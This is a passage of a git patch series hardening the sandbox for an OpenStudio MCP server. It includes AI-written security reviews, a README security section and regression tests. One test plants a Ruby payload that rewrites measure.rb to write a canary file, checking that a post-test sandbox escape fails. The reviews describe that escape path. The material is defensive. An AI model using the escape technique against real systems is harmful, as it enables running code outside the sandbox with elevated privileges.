+        (stage / "workflow.osw").write_text(json.dumps({"seed_file": "model.osm"}))
+        run_root = tmp_path / "runs"
+        run_root.mkdir()
+        self._stub(monkeypatch, run_root)
+
+        class _FakePopen:
+            def __init__(self, *a, **kw):
+                self.returncode = 1
+                self.pid = 999
+            def poll(self):
+                return self.returncode
+            def wait(self, timeout=None):
+                return self.returncode
+            def kill(self):
+                pass
+
+        monkeypatch.setattr(_subprocess, "Popen", _FakePopen)
+        from mcp_server.skills.simulation.operations import run_osw
+        result = run_osw(str(stage / "workflow.osw"), _internal=True)
+        assert "not allowed" not in result.get("error", "").lower(), result
+        assert len(list(run_root.iterdir())) == 1, f"internal staging should create a run dir: {result}"
diff --git a/tests/test_sandbox.py b/tests/test_sandbox.py
index 24ebcac..efcc932 100644
--- a/tests/test_sandbox.py
+++ b/tests/test_sandbox.py
@@ -790,3 +790,50 @@ def test_wrap_cmd_grants_device_files_not_whole_dev(monkeypatch, tmp_path):
     assert "/dev/null" in rw and "/dev/zero" in rw, f"missing rw device files: {rw}"
     assert "/dev/urandom" in ro and "/dev/random" in ro, f"missing ro device files: {ro}"
     assert "/dev/shm" not in rw and "/dev/shm" not in ro, "/dev/shm must never be granted"  # noqa: S108
+
+
+def test_test_measure_does_not_mutate_shared_source(tmp_path, monkeypatch):
+    # Regression (Codex #3): test_measure executed in the caller's measure dir,
+    # writing test_model.osm + chowning + Landlock-granting it. For a measure under a
+    # SHARED read-only root (e.g. a bundled measure) that mutates shared/host content.
+    # The fix copies a non-writable-root measure into a private run dir and tests the
+    # copy, leaving the source untouched. (Monkeypatches config ROOTS — environment
+    # setup, like RUN_ROOT — not the unit under test.)
+    from mcp_server import config
+    from mcp_server.skills.measure_authoring import operations as mops
+
+    shared_root = tmp_path / "shared"
+    measure = shared_root / "mymeasure"
+    (measure / "tests").mkdir(parents=True)
+    (measure / "measure.rb").write_text("# fake ModelMeasure\nclass M\nend\n")
+    (measure / "tests" / "mymeasure_test.rb").write_text("require 'openstudio'\n")
+    model = shared_root / "seed.osm"
+    model.write_text("OS:Version,;\n")  # a readable file to copy as the test model
+
+    # Treat shared_root as a shared READ-ONLY root; private writable area elsewhere.
+    monkeypatch.setattr(config, "_SHARED_READ_ROOTS",
+                        [*config._SHARED_READ_ROOTS, shared_root.resolve()])
+    run_root = tmp_path / "runs"
+    run_root.mkdir()
+    monkeypatch.setattr(mops, "user_run_root", lambda: run_root)
+
+    mops.test_measure_op(str(measure), model_path=str(model))
+
+    assert not (measure / "tests" / "test_model.osm").exists(), \
+        "test_model.osm was written into the SHARED measure source — must use a private copy"
+    assert sorted(p.name for p in (measure / "tests").iterdir()) == ["mymeasure_test.rb"], \
+        "shared measure source/tests was mutated"
+
+
+def test_input_root_not_in_landlock_ro_allowlist():
+    # Regression (Codex #5): /inputs (INPUT_ROOT) is a SHARED multi-tenant dir;
+    # granting it read in the Landlock policy let one tenant's confined measure read
+    # another tenant's inputs. Inputs are staged into the run dir, so /inputs must
+    # NOT be a read-only root.
+    from mcp_server import sandbox
+    from mcp_server.config import COMMON_MEASURES_DIR, COMSTOCK_MEASURES_DIR, INPUT_ROOT
+    ro = sandbox._ro_paths()
+    assert str(INPUT_ROOT) not in ro, f"INPUT_ROOT must not be a Landlock RO root: {ro}"
+    # The legitimately-needed shared measure roots are still granted.
+    assert str(COMSTOCK_MEASURES_DIR) in ro and str(COMMON_MEASURES_DIR) in ro, \
+        f"bundled-measure roots must stay readable: {ro}"

From eb82af8802ec5df083576b66254e46509947b05f Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sun, 7 Jun 2026 10:25:38 -0400
Subject: [PATCH 23/26] Harden post-test measure metadata refresh

---
 codex-security-review-develop.MD              | 159 +++++++++++++
 ...curity-review-feat-measure-exec-sandbox.MD | 214 ++++++++++++++++++
 .../skills/measure_authoring/operations.py    |  73 +++++-
 tests/test_sandbox.py                         |  60 +++++
 4 files changed, 495 insertions(+), 11 deletions(-)
 create mode 100644 codex-security-review-develop.MD
 create mode 100644 codex-security-review-feat-measure-exec-sandbox.MD

diff --git a/codex-security-review-develop.MD b/codex-security-review-develop.MD
new file mode 100644
index 0000000..2622440
--- /dev/null
+++ b/codex-security-review-develop.MD
@@ -0,0 +1,159 @@
+# Codex Security Review: `develop`
+
+Reviewed June 7, 2026.
+
+## Findings
+
+### Critical: Arbitrary measure code runs with the MCP container's authority
+
+Measures and tests execute arbitrary Ruby/Python as the container user, with
+the full environment and all container mounts. `apply_measure` invokes
+`openstudio` directly with `os.environ.copy()`.
+
+`test_measure` directly runs `pytest` or Ruby. Since the image has no `USER`,
+this is probably root inside the container.
+
+### Critical: `run_osw` is also arbitrary-code execution
+
+An OSW can contain measure steps. `run_osw` accepts an unrestricted path,
+copies the OSW's entire parent directory, and executes it. It must be sandboxed
+exactly like `apply_measure`.
+
+### Critical: Simulation paths bypass the established path policy
+
+`run_simulation` accepts unrestricted OSM and EPW paths. A caller can cause an
+arbitrary readable file to be copied into their run directory. This bypasses
+the otherwise established `is_path_allowed()` policy.
+
+### Critical: `test_measure` modifies and executes in the source directory
+
+`test_measure` writes `tests/test_model.osm`, runs tests in the caller-provided
+measure directory, and updates `measure.xml`. If the directory is under
+`/repo`, `/inputs`, or another host mount, untrusted code can modify host files.
+
+### High: Writable bind mounts expose the host filesystem
+
+The documented launch configuration mounts `/inputs` and `/runs` read-write.
+Docker bind mounts are host filesystem access; container processes can modify
+or delete host files unless the mounts are read-only.
+
+### High: The container lacks basic runtime hardening
+
+The container has no non-root `USER`, read-only root filesystem, capability
+drop, `no-new-privileges`, network restriction, PID limit, or memory/CPU limit.
+
+### High: Documentation describes sandbox controls absent from `develop`
+
+The sandbox plan claims several protections are complete, but the referenced
+`sandbox.py`, Landlock, seccomp, and execution shim are absent from the
+`develop` checkout. This creates dangerous false assurance.
+
+### Medium: Process lifecycle controls are incomplete
+
+Simulations have no enforced wall-clock timeout and cancellation kills only
+the recorded parent PID, not the complete process group or cgroup.
+
+### Medium: Generated Ruby strings permit interpolation
+
+Ruby string generation does not escape `#{...}` interpolation. Metadata fields
+could execute expressions when `openstudio measure -u` evaluates the generated
+measure.
+
+## Recommended Architecture
+
+Do not run untrusted code as a subprocess inside the long-lived MCP container.
+Use two components:
+
+```text
+MCP control plane
+  |
+  | job manifest + staged files
+  v
+Job runner/orchestrator
+  |
+  v
+Ephemeral sandbox worker
+  - one job only
+  - input mount read-only
+  - private output mount read-write
+  - no /repo, shared /runs, /inputs, home, or Docker socket
+  - no network
+  - destroyed after completion
+```
+
+The MCP server should:
+
+1. Validate requested paths.
+2. Copy only explicitly referenced OSM, EPW, measure, and OSW files into a
+   private job input directory.
+3. Submit an immutable job manifest containing hashes and limits.
+4. Receive only approved result artifacts.
+5. Never receive the Docker socket. A separate trusted runner should create
+   worker containers.
+
+The worker should use controls equivalent to:
+
+```text
+--runtime=runsc
+--network=none
+--read-only
+--user=10001:10001
+--cap-drop=ALL
+--security-opt=no-new-privileges=true
+--pids-limit=256
+--memory=<appropriate limit>
+--cpus=<appropriate limit>
+--tmpfs=/tmp:rw,noexec,nosuid,nodev,size=...
+input:/job/input:ro
+output:/job/output:rw
+```
+
+Also use the default or tighter seccomp profile, AppArmor/SELinux policy, a
+hard wall timeout, storage quotas, and kill the entire worker container on
+cancellation.
+
+## Tool Policy
+
+- `run_simulation`: sandboxed worker, with an internally generated OSW
+  containing no measure steps.
+- `run_osw`: sandboxed worker; disabled by default for remote users or reject
+  measure steps unless explicitly authorized.
+- `apply_measure`: sandboxed worker.
+- `test_measure`: sandboxed worker operating on a staged copy.
+- `openstudio measure -u`: sandboxed worker because it loads measure code.
+- Syntax checks: sandboxed too. Tests and imports can execute code through
+  plugins and startup behavior.
+
+Measure authoring itself can remain in the control plane if it only writes text
+into a private user directory. Any evaluation of that text must leave the
+control plane.
+
+## Deployment Priority
+
+1. Immediately mount `/inputs` and `/repo` read-only; mount only a dedicated
+   output directory read-write.
+2. Run the MCP image as non-root and add Docker resource/security flags.
+3. Disable `run_osw`, `apply_measure`, and `test_measure` in remote deployments
+   until isolated execution exists.
+4. Add `is_path_allowed()` checks to every simulation and measure path.
+5. Stage inputs into private job directories and reject symlinks and escaping
+   OSW references.
+6. Implement ephemeral worker containers.
+7. Use gVisor `runsc` for untrusted multi-user workloads; use microVMs if the
+   threat model includes determined hostile tenants.
+8. Add attack tests proving filesystem escape, environment leakage, network
+   access, fork exhaustion, and cross-user access succeed without the sandbox
+   and fail with it.
+
+Rootless Docker or user-namespace remapping reduces host impact, but neither
+replaces per-job isolation. Static measure scanning and human approval are
+useful secondary controls, not containment.
+
+## Sources
+
+- [Docker bind mounts](https://docs.docker.com/engine/storage/bind-mounts/)
+- [Docker container security options](https://docs.docker.com/reference/cli/docker/container/run)
+- [Docker seccomp](https://docs.docker.com/engine/security/seccomp/)
+- [Docker rootless mode](https://docs.docker.com/engine/security/rootless/)
+- [gVisor](https://gvisor.dev/docs/)
+- [gVisor with Docker](https://gvisor.dev/docs/user_guide/quick_start/docker/)
diff --git a/codex-security-review-feat-measure-exec-sandbox.MD b/codex-security-review-feat-measure-exec-sandbox.MD
new file mode 100644
index 0000000..f8ae884
--- /dev/null
+++ b/codex-security-review-feat-measure-exec-sandbox.MD
@@ -0,0 +1,214 @@
+# Codex Security Review: `feat/measure-exec-sandbox`
+
+Reviewed June 7, 2026.
+
+## Verdict
+
+The branch makes substantial, technically sound improvements over `develop`.
+Landlock, seccomp, environment filtering, UID dropping, path checks, symlink
+checks, rlimits, and simulation process-group termination materially reduce the
+blast radius of authored measures.
+
+It is a good defense-in-depth sandbox for a local or trusted single-container
+deployment. It is not yet a sufficient hostile multi-tenant boundary. One
+critical post-test sandbox escape remains, and process/resource isolation is
+still weaker than a per-job container or microVM.
+
+## Findings
+
+### Critical: sandboxed tests are followed by unsandboxed Ruby execution
+
+After `test_measure_op` runs untrusted tests in the sandbox, it calls
+`_update_measure_xml(mdir, language)`. That helper executes:
+
+```text
+openstudio measure -u <measure_dir>
+```
+
+without `sandbox.build_env()`, `sandbox.prepare_workdir()`, or
+`sandbox.wrap_cmd()`.
+
+A sandboxed test has write access to its measure directory. It can replace
+`measure.rb` with top-level Ruby code, finish successfully, and rely on the
+root MCP process to load that modified file during the XML update. This crosses
+the sandbox boundary and restores arbitrary code execution with the server's
+authority.
+
+Required fix:
+
+- Never evaluate a file after it has been writable by untrusted code using an
+  unsandboxed process.
+- Run `openstudio measure -u` through the sandbox.
+- Prefer running it on a fresh private copy and copying only validated
+  `measure.xml` metadata back.
+- Alternatively, update checksums/metadata with a non-executing XML writer.
+
+### High: measure and test timeout handling can leave descendants alive
+
+`apply_measure`, reporting-measure tests, and normal measure tests use
+`subprocess.run(..., timeout=...)` without a new session or cgroup. On timeout,
+Python terminates the immediate wrapper process, but forked or daemonized
+children can survive.
+
+Those descendants retain their inherited Landlock/seccomp policy, but they can
+continue consuming CPU, PIDs, memory, and storage. They can also interfere with
+other sandbox workers that share UID 1001.
+
+Required fix:
+
+- Start every untrusted execution in a new session/process group.
+- On timeout, send TERM and then KILL to the complete process group.
+- Prefer a per-job cgroup or container and destroy that unit on completion.
+
+### High: shared UID and PID namespace weaken cross-user isolation
+
+Every worker uses UID 1001 in the same container and PID namespace. `/proc` is
+also granted read access. Concurrent jobs can observe process metadata and may
+signal same-UID processes. Depending on kernel ptrace policy, they may also
+inspect or manipulate peer processes.
+
+The default simulation concurrency of one does not cover concurrent
+`apply_measure` or `test_measure` calls.
+
+Required fix:
+
+- Use a separate PID namespace or container for each job.
+- At minimum, deny `ptrace`, `process_vm_readv`, `process_vm_writev`, and
+  cross-worker signaling where practical.
+- Use per-job UIDs if multiple jobs remain in one PID namespace.
+- Do not grant the host/container-wide `/proc`; mount a private proc filesystem.
+
+### High: broad `/etc`, `/proc`, and `/sys` read grants expose unnecessary data
+
+The Landlock policy grants all of `/etc`, `/proc`, and `/sys` read access.
+Dropped UID permissions block some sensitive files, but world-readable
+configuration, process metadata, mounted configuration secrets, kernel details,
+and service information remain visible.
+
+Required fix:
+
+- Determine the exact runtime files OpenStudio requires and grant only those.
+- Stage required certificates, locale data, timezone data, and configuration
+  into a minimal runtime root.
+- Use mount/PID namespaces where broad compatibility paths are unavoidable.
+
+### Medium: runtime hardening is not part of the documented default launch
+
+The image adds a sandbox UID, but the long-lived MCP server still runs as root.
+The README launch example does not apply `--read-only`, `--cap-drop=ALL`,
+`no-new-privileges`, PID/memory/CPU limits, or read-only input mounts.
+
+The subprocess sandbox reduces measure risk, but ordinary MCP server bugs still
+execute with root authority inside a container with writable host mounts.
+
+Recommended fix:
+
+- Run the control-plane server as non-root where OpenStudio permits it.
+- Make `/inputs`, `/repo`, and `/skills` read-only.
+- Apply container resource limits and capability restrictions.
+- Keep only a dedicated output/job directory writable.
+
+### Medium: sandbox status is not actually surfaced
+
+`active_tier()` exists but is not included in tool responses or audit events.
+It infers the tier from platform/configuration rather than a successful backend
+probe. Full mode does fail closed at execution time, which is good, but
+operators cannot inspect the effective state before submitting work.
+
+Recommended fix:
+
+- Probe Landlock/seccomp at startup.
+- Expose the result in `get_server_status`, audit logs, and every execution
+  result.
+- Distinguish requested mode from verified active controls.
+
+### Medium: public `run_osw` still copies the entire parent directory
+
+Path and escaping-symlink checks close the arbitrary-host-file issue, but
+copying the whole parent directory is still unnecessarily broad. An OSW in a
+large allowed directory can copy unrelated data and consume substantial disk.
+
+Recommended fix:
+
+- Parse the OSW and stage only explicitly referenced seed, weather, measure,
+  file, and companion resources.
+- Reject absolute and parent-traversing references unless separately authorized.
+- Apply file-count and byte limits during staging.
+
+### Low: rlimit installation failures do not fail closed
+
+The shim logs an rlimit failure and continues. Landlock and seccomp correctly
+fail closed, but resource backstops can silently be absent.
+
+Recommended fix:
+
+- Treat configured mandatory limits as fatal.
+- Record applied limits in the execution result.
+
+## Changes That Correctly Address `develop`
+
+- `apply_measure`, reporting-measure tests, normal tests, and simulations now
+  pass through a common sandbox wrapper.
+- The subprocess environment is explicitly allowlisted instead of inheriting
+  server secrets.
+- Full mode fails closed if Landlock or seccomp cannot engage.
+- Landlock is read-deny-by-default and limits writes to the job directory.
+- `/repo` and shared `/inputs` are no longer granted to the confined process.
+- `/dev` is reduced to specific device files.
+- Seccomp denies IPv4/IPv6 sockets and handles unexpected architectures and x32
+  fail-closed.
+- `io_uring_setup` is denied to prevent a network-filter bypass.
+- The child drops to a validated non-root UID/GID and sets `no_new_privs`.
+- Public simulation/OSW paths now use `is_path_allowed()`.
+- Escaping symlinks are rejected before staging.
+- Shared measures are copied before tests mutate them.
+- Simulation wall-clock timeout and process-group cancellation are implemented.
+- Ruby interpolation and generated argument identifiers are validated.
+- Unknown sandbox modes and non-finite timeout values no longer silently weaken
+  policy.
+- Security tests use dual-run canaries to prove both the original vulnerability
+  and the confined behavior.
+
+## How I Would Design It Differently
+
+For untrusted or remote multi-user use, I would make the process sandbox a
+secondary control and use a per-job worker as the primary boundary:
+
+```text
+non-root MCP control plane
+  -> validated immutable job manifest
+  -> trusted runner service
+  -> ephemeral worker container using gVisor/runsc
+```
+
+Each worker would receive:
+
+- One read-only staged input directory containing only referenced files.
+- One private writable output directory.
+- No `/repo`, shared `/runs`, `/inputs`, user home, credentials, or Docker
+  socket.
+- `--network=none`.
+- A read-only root filesystem and bounded tmpfs.
+- Non-root UID, all capabilities dropped, `no-new-privileges`.
+- Dedicated PID, mount, IPC, user, and network namespaces.
+- Cgroup limits for memory, CPU, PIDs, I/O, and wall time.
+- Automatic destruction on success, failure, cancellation, or timeout.
+
+The control plane would validate and copy back only expected artifacts. It
+would never execute generated Ruby or Python after a worker has modified it.
+
+This costs more operationally, but it gives a much clearer security claim:
+arbitrary measure code can compromise only an ephemeral worker and its private
+job data, not the long-lived MCP process or another user's execution.
+
+## Verification
+
+Focused Windows-compatible tests:
+
+```text
+46 passed, 16 skipped, 1 deselected
+```
+
+The excluded test directly exercises Linux non-root Landlock behavior and
+cannot run on Windows. Docker integration could not be rerun during this review
+because access to the local Docker Desktop engine was denied.
diff --git a/mcp_server/skills/measure_authoring/operations.py b/mcp_server/skills/measure_authoring/operations.py
index a48d217..30bb848 100644
--- a/mcp_server/skills/measure_authoring/operations.py
+++ b/mcp_server/skills/measure_authoring/operations.py
@@ -500,17 +500,68 @@ def _update_measure_xml(measure_dir: Path, language: str):
     """
     if language != "Ruby":
         return
-    # NOTE: `measure -u` only executes the GENERATED arguments() method (built from
-    # validated/escaped arg specs — see _checked_arg_name / _escape_*), NOT the
-    # LLM's run_body. So it is not untrusted code and is not sandbox-wrapped here
-    # (wrapping it as the sandbox uid breaks the in-place measure.xml rewrite).
-    try:
-        subprocess.run(
-            ["openstudio", "measure", "-u", str(measure_dir)],
-            capture_output=True, text=True, timeout=30, check=False,
-        )
-    except (FileNotFoundError, subprocess.TimeoutExpired):
-        pass
+    # The directory may have been writable by untrusted test code. Never load a
+    # post-test measure script with the long-lived server's privileges.
+    symlink_error = reject_escaping_symlinks(measure_dir)
+    if symlink_error:
+        raise RuntimeError(symlink_error)
+
+    with tempfile.TemporaryDirectory(prefix="osmcp_measure_xml_") as tmp:
+        staged_measure = Path(tmp) / measure_dir.name
+        shutil.copytree(measure_dir, staged_measure, symlinks=True)
+        run_env = sandbox.build_env(staged_measure)
+        sandbox.prepare_workdir(Path(tmp))
+        try:
+            proc = subprocess.run(  # noqa: S603 - argv is fixed and sandbox-wrapped
+                sandbox.wrap_cmd(
+                    ["openstudio", "measure", "-u", str(staged_measure)],
+                    staged_measure,
+                ),
+                cwd=str(staged_measure),
+                env=run_env,
+                capture_output=True,
+                text=True,
+                timeout=30,
+                check=False,
+            )
+        except (FileNotFoundError, subprocess.TimeoutExpired):
+            return
+
+        detail = "\n".join(part.strip() for part in (proc.stdout, proc.stderr) if part.strip())
+        staged_xml = staged_measure / "measure.xml"
+        if proc.returncode != 0 or not staged_xml.is_file() or staged_xml.is_symlink():
+            raise RuntimeError(
+                f"Failed to update measure.xml (exit {proc.returncode}): {detail[-1000:]}",
+            )
+
+        def _copy_generated(name: str, max_bytes: int) -> None:
+            source = staged_measure / name
+            if not source.exists():
+                return
+            if not source.is_file() or source.is_symlink():
+                raise RuntimeError(f"Failed to update measure metadata: invalid generated {name}")
+            data = source.read_bytes()
+            if len(data) > max_bytes:
+                raise RuntimeError(
+                    f"Failed to update measure metadata: generated {name} exceeds "
+                    f"{max_bytes} bytes",
+                )
+            temp_path: Path | None = None
+            with tempfile.NamedTemporaryFile(
+                dir=measure_dir,
+                prefix=f".{name}_",
+                delete=False,
+            ) as fh:
+                fh.write(data)
+                temp_path = Path(fh.name)
+            try:
+                temp_path.chmod(0o644)
+                temp_path.replace(measure_dir / name)
+            finally:
+                temp_path.unlink(missing_ok=True)
+
+        _copy_generated("measure.xml", 5_000_000)
+        _copy_generated("README.md", 5_000_000)
 
 
 def _add_intended_software_tools(measure_dir: Path):
diff --git a/tests/test_sandbox.py b/tests/test_sandbox.py
index efcc932..00e62e6 100644
--- a/tests/test_sandbox.py
+++ b/tests/test_sandbox.py
@@ -622,6 +622,66 @@ async def _run_test_measure(url, port):
         auto_listener.close()
 
 
+def test_measure_xml_refresh_does_not_execute_rewritten_measure_unconfined(full_server):
+    # Regression: sandboxed test code could rewrite measure.rb, then test_measure
+    # ran `openstudio measure -u` unsandboxed as root and evaluated the rewritten
+    # file. A disposable /repo canary proves no post-test evaluation escapes.
+    url, _ = full_server
+    canary = Path(f"/repo/_sandbox_xml_refresh_{uuid.uuid4().hex[:10]}.txt")
+
+    async def _run():
+        async with http_session(url) as s:
+            await setup_example(s, _unique())
+            created = unwrap(await s.call_tool("create_measure", {
+                "name": _unique("xml_refresh_probe"),
+                "description": "Benign post-test XML refresh confinement probe.",
+                "run_body": "    runner.registerInfo('normal measure body')",
+                "language": "Ruby",
+                "arguments": [],
+            }))
+            assert created["ok"] is True, f"create_measure failed: {created}"
+
+            measure_dir = Path(created["measure_dir"])
+            test_files = sorted((measure_dir / "tests").glob("*_test.rb"))
+            assert len(test_files) == 1, (
+                f"generated Ruby measure should have exactly one test file, got {test_files}"
+            )
+            test_files[0].write_text(
+                textwrap.dedent(
+                    f"""
+                    require 'openstudio'
+                    require 'minitest/autorun'
+                    require_relative '../measure'
+
+                    class XmlRefreshRewriteTest < Minitest::Test
+                      def test_rewrite_measure_after_load
+                        measure_path = File.expand_path('../measure.rb', __dir__)
+                        original = File.read(measure_path)
+                        payload = "File.write('{canary}', 'UNSANDBOXED_XML_REFRESH')\\n"
+                        File.write(measure_path, payload + original)
+                        assert_equal(false, File.exist?('{canary}'))
+                      end
+                    end
+                    """,
+                ).lstrip(),
+                encoding="utf-8",
+            )
+
+            return unwrap(await s.call_tool("test_measure", {
+                "measure_dir": str(measure_dir),
+            }))
+
+    try:
+        result = asyncio.run(_run())
+        assert result["ok"] is True, f"sandboxed measure test should pass: {result}"
+        assert not canary.exists(), (
+            "post-test `openstudio measure -u` evaluated rewritten measure.rb "
+            "outside the sandbox and created the host-mounted canary"
+        )
+    finally:
+        canary.unlink(missing_ok=True)
+
+
 # ---------------------------------------------------------------------------
 # Codex review reproductions (confirm-now): each PASSES today by demonstrating
 # the open hole, run under the FULL tier (OSMCP_SANDBOX=auto) so it proves the

From 9633194e587594880d06934cc22ae169adf5ea7b Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sun, 7 Jun 2026 11:01:56 -0400
Subject: [PATCH 24/26] Document simulation sandbox security

---
 README.md | 72 ++++++++++++++++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 71 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 178b727..9ed965b 100644
--- a/README.md
+++ b/README.md
@@ -52,7 +52,7 @@ Add to your Claude Desktop config (`~/Library/Application Support/Claude/claude_
       "command": "docker",
       "args": [
         "run", "--rm", "-i",
-        "-v", "./tests/assets:/inputs",
+        "-v", "./tests/assets:/inputs:ro",
         "-v", "./runs:/runs",
         "-v", "./.claude/skills:/skills:ro",
         "-e", "OPENSTUDIO_MCP_MODE=prod",
@@ -95,6 +95,76 @@ See **[docs/remote-multi-user.md](docs/remote-multi-user.md)** for setup, auth,
 
 ---
 
+## Security and simulation sandbox
+
+OpenStudio measures are Ruby or Python programs and must be treated as untrusted
+code. EnergyPlus workflows can also invoke measure code. Docker isolates the
+container from the host, while openstudio-mcp adds a second sandbox around the
+child processes used by `apply_measure`, `test_measure`, measure metadata
+refresh, and simulations.
+
+The default `OSMCP_SANDBOX=auto` mode provides the following controls on Linux,
+including Docker Desktop's Linux VM:
+
+- **Privilege drop:** child processes run as the image's unprivileged
+  `sandbox` user (UID/GID 1001), while the MCP server retains only the
+  privileges needed to prepare run directories.
+- **Filesystem policy:** Landlock denies filesystem access by default. The
+  current run or staged measure directory is writable; required system and
+  OpenStudio directories are read-only. `/repo`, `/inputs`, and other users'
+  run directories are not exposed to measure code.
+- **Network policy:** seccomp denies outbound IP networking by default.
+- **Secret isolation:** child processes receive an allowlisted environment
+  instead of inheriting API keys, tokens, and other server environment
+  variables.
+- **Process hardening:** `no_new_privs` prevents privilege recovery through
+  setuid executables. Resource limits constrain generated file size and process
+  count, and simulations have a wall-clock timeout.
+- **Staging:** input models, weather files, measures, and OSWs are copied into a
+  private run directory before execution. Escaping symlinks are rejected.
+
+On Linux, `auto` fails closed if Landlock or the seccomp network filter cannot
+be installed: the untrusted child process does not run. On native macOS or
+Windows without Docker, kernel confinement is unavailable and the server warns
+that only environment filtering is active. Use the Docker image when running
+untrusted measures.
+
+### Sandbox options
+
+| Variable | Default | Behavior |
+|----------|---------|----------|
+| `OSMCP_SANDBOX` | `auto` | `auto`, `full`, and `landlock` request environment filtering, UID/GID drop, resource limits, Landlock filesystem confinement, and seccomp network denial. `posix` omits Landlock and seccomp. `off` disables child-process confinement and is only appropriate for trusted local code. Unknown values fall back to `auto`. |
+| `OSMCP_SANDBOX_NET` | `deny` | `deny` blocks outbound IP networking. `allow` permits it for trusted measures that must fetch external resources. |
+| `OSMCP_SANDBOX_UID` / `OSMCP_SANDBOX_GID` | `1001` | Account used for confined child processes. Values less than 1 are rejected. The default matches the `sandbox` user built into the image. |
+| `OSMCP_SANDBOX_RLIMIT_FSIZE` | `10737418240` | Maximum size in bytes of one file created by a child process. `0` disables this limit. |
+| `OSMCP_SANDBOX_RLIMIT_NPROC` | `1024` | Maximum processes/threads for the sandbox UID. `0` disables this limit. |
+| `OSMCP_SANDBOX_RLIMIT_NOFILE` | `0` | Optional open-file descriptor limit. |
+| `OSMCP_SANDBOX_RLIMIT_CPU` | `0` | Optional CPU-seconds limit. Disabled by default because annual simulations can be long-running. |
+| `OSMCP_SANDBOX_RLIMIT_AS` | `0` | Optional virtual-memory limit. Prefer Docker memory limits because restrictive address-space limits can break EnergyPlus. |
+| `OSMCP_SIM_TIMEOUT_SECONDS` | `7200` | Wall-clock timeout for a simulation. `0` disables the timeout. |
+
+### Secure deployment guidance
+
+- Mount `/inputs` read-only: `-v /host/inputs:/inputs:ro`.
+- Mount only the output directory at `/runs`; any process allowed to write
+  `/runs` can modify that host directory by design.
+- Mount workflow guides read-only at `/skills`, or use the copy already baked
+  into the image: `-v /host/.claude/skills:/skills:ro`.
+- Do not mount the repository, home directory, Docker socket, credentials, or
+  broad host paths into production containers. The `/repo` source mount in the
+  testing commands is for development only.
+- Keep `OSMCP_SANDBOX=auto` and `OSMCP_SANDBOX_NET=deny` for untrusted measure
+  authoring. Docker's `--network none` can provide an additional
+  container-wide network boundary when remote access is not required.
+- Use Docker CPU, memory, PID, and disk quotas as outer limits. The in-process
+  resource limits are defense in depth, not replacements for container limits.
+
+The sandbox protects the host and other run directories, but it intentionally
+allows measure code to modify its own staged run directory. Treat resulting
+OSM, SQL, report, and log files as untrusted outputs.
+
+---
+
 ## Workflow skills
 
 In Claude Code, 12 bundled skills add workflow automation and domain knowledge:

From 6d803f1f5021c28a7d73fe21b2043481c4209421 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sun, 7 Jun 2026 11:37:27 -0400
Subject: [PATCH 25/26] fix(security): address PR #64 review (Copilot + manual)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Fixup on the post-test measure-metadata-refresh hardening:

1. Drop two raw codex-review dumps committed to repo root (codex-security-review-*.MD) — docs/review/ is already gitignored for exactly these artifacts.

2. Bounded, no-follow copy-back (Copilot C1 + TOCTOU): new util.read_file_bounded reads measure.xml/README.md with O_NOFOLLOW and caps the read at max_bytes+1, so a confined-but-untrusted 'measure -u' cannot slurp a giant file into the unconfined server nor swap the output for a symlink to a host secret.

3. chmod best-effort (Copilot C2): replace() is the critical step; suppress OSError so a restrictive mount/non-POSIX host does not fail the whole refresh.

4. test_measure: post-test refresh is now best-effort — a failure is surfaced as metadata_warning instead of masking a passing (confined) test. Confinement, not the refresh exit code, is the security boundary. create/edit keep the raise (there the xml IS the product).

Tests (red-green verified): test_path_safety read_file_bounded (oversize/symlink/non-regular); test_measure_authoring passing-test-not-masked (RED on revert: ok:False 'Symlink escapes...').

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 codex-security-review-develop.MD              | 159 -------------
 ...curity-review-feat-measure-exec-sandbox.MD | 214 ------------------
 .../skills/measure_authoring/operations.py    |  40 +++-
 mcp_server/util.py                            |  45 ++++
 tests/test_measure_authoring.py               |  54 +++++
 tests/test_path_safety.py                     |  44 ++++
 6 files changed, 171 insertions(+), 385 deletions(-)
 delete mode 100644 codex-security-review-develop.MD
 delete mode 100644 codex-security-review-feat-measure-exec-sandbox.MD

diff --git a/codex-security-review-develop.MD b/codex-security-review-develop.MD
deleted file mode 100644
index 2622440..0000000
--- a/codex-security-review-develop.MD
+++ /dev/null
@@ -1,159 +0,0 @@
-# Codex Security Review: `develop`
-
-Reviewed June 7, 2026.
-
-## Findings
-
-### Critical: Arbitrary measure code runs with the MCP container's authority
-
-Measures and tests execute arbitrary Ruby/Python as the container user, with
-the full environment and all container mounts. `apply_measure` invokes
-`openstudio` directly with `os.environ.copy()`.
-
-`test_measure` directly runs `pytest` or Ruby. Since the image has no `USER`,
-this is probably root inside the container.
-
-### Critical: `run_osw` is also arbitrary-code execution
-
-An OSW can contain measure steps. `run_osw` accepts an unrestricted path,
-copies the OSW's entire parent directory, and executes it. It must be sandboxed
-exactly like `apply_measure`.
-
-### Critical: Simulation paths bypass the established path policy
-
-`run_simulation` accepts unrestricted OSM and EPW paths. A caller can cause an
-arbitrary readable file to be copied into their run directory. This bypasses
-the otherwise established `is_path_allowed()` policy.
-
-### Critical: `test_measure` modifies and executes in the source directory
-
-`test_measure` writes `tests/test_model.osm`, runs tests in the caller-provided
-measure directory, and updates `measure.xml`. If the directory is under
-`/repo`, `/inputs`, or another host mount, untrusted code can modify host files.
-
-### High: Writable bind mounts expose the host filesystem
-
-The documented launch configuration mounts `/inputs` and `/runs` read-write.
-Docker bind mounts are host filesystem access; container processes can modify
-or delete host files unless the mounts are read-only.
-
-### High: The container lacks basic runtime hardening
-
-The container has no non-root `USER`, read-only root filesystem, capability
-drop, `no-new-privileges`, network restriction, PID limit, or memory/CPU limit.
-
-### High: Documentation describes sandbox controls absent from `develop`
-
-The sandbox plan claims several protections are complete, but the referenced
-`sandbox.py`, Landlock, seccomp, and execution shim are absent from the
-`develop` checkout. This creates dangerous false assurance.
-
-### Medium: Process lifecycle controls are incomplete
-
-Simulations have no enforced wall-clock timeout and cancellation kills only
-the recorded parent PID, not the complete process group or cgroup.
-
-### Medium: Generated Ruby strings permit interpolation
-
-Ruby string generation does not escape `#{...}` interpolation. Metadata fields
